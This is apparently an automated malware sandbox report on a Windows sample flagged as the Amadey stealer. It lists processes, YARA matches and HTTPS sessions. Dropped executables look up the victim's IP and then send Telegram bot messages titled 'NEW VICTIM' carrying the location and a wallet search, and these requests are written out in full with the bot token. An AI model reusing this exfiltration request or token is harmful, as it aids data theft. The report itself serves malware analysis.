                                                                                                                                                                                                                                                                                        Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?|^x;cxM[]%8#pq3!gQv;ezF;_G3X1


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        7192.168.2.104990034.117.59.814438120C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:27 UTC91OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: IPInfoFetcher
                                                                                                                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:27 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                                                                                        Content-Length: 321
                                                                                                                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                        date: Thu, 12 Dec 2024 15:48:27 GMT
                                                                                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:27 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                                                                                                                                                                        Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        8192.168.2.1049903149.154.167.2204438092C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:27 UTC513OUTGET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: TelegramBot
                                                                                                                                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:28 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:28 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                        Content-Length: 776
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:28 UTC776INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c
                                                                                                                                                                                                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":3300,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        9192.168.2.1049908149.154.167.2204438120C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC513OUTGET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: TelegramBot
                                                                                                                                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:29 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                        Content-Length: 776
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC776INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c
                                                                                                                                                                                                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":3301,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        10192.168.2.104990934.117.59.814431868C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC91OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: IPInfoFetcher
                                                                                                                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                                                                                        Content-Length: 321
                                                                                                                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                        date: Thu, 12 Dec 2024 15:48:29 GMT
                                                                                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:29 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                                                                                                                                                                        Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        11192.168.2.104991734.117.59.814431528C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:31 UTC91OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: IPInfoFetcher
                                                                                                                                                                                                                                                                                        Host: ipinfo.io
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:31 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                                                                                        Content-Length: 321
                                                                                                                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                        date: Thu, 12 Dec 2024 15:48:31 GMT
                                                                                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:31 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                                                                                                                                                                        Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        12192.168.2.1049916149.154.167.2204431868C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:31 UTC513OUTGET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: TelegramBot
                                                                                                                                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:31 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:31 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                        Content-Length: 776
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:31 UTC776INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c
                                                                                                                                                                                                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":3302,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        13192.168.2.1049920149.154.167.2204431528C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:33 UTC513OUTGET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: TelegramBot
                                                                                                                                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:33 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:33 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                        Content-Length: 776
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:33 UTC776INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c
                                                                                                                                                                                                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":3303,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",


                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                        Start time:10:46:59
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                                                                                                                        File size:3'189'248 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:AD7F121646AA374AF133772519375710
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                                        Start time:10:47:03
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0xfb0000
                                                                                                                                                                                                                                                                                        File size:3'189'248 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:AD7F121646AA374AF133772519375710
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                                        Start time:10:47:04
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        Imagebase:0xfb0000
                                                                                                                                                                                                                                                                                        File size:3'189'248 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:AD7F121646AA374AF133772519375710
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                                        Start time:10:48:00
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        Imagebase:0xfb0000
                                                                                                                                                                                                                                                                                        File size:3'189'248 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:AD7F121646AA374AF133772519375710
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                        Start time:10:48:12
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff643f20000
                                                                                                                                                                                                                                                                                        File size:605'696 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                        Start time:10:48:14
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff643f20000
                                                                                                                                                                                                                                                                                        File size:605'696 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                                        Start time:10:48:18
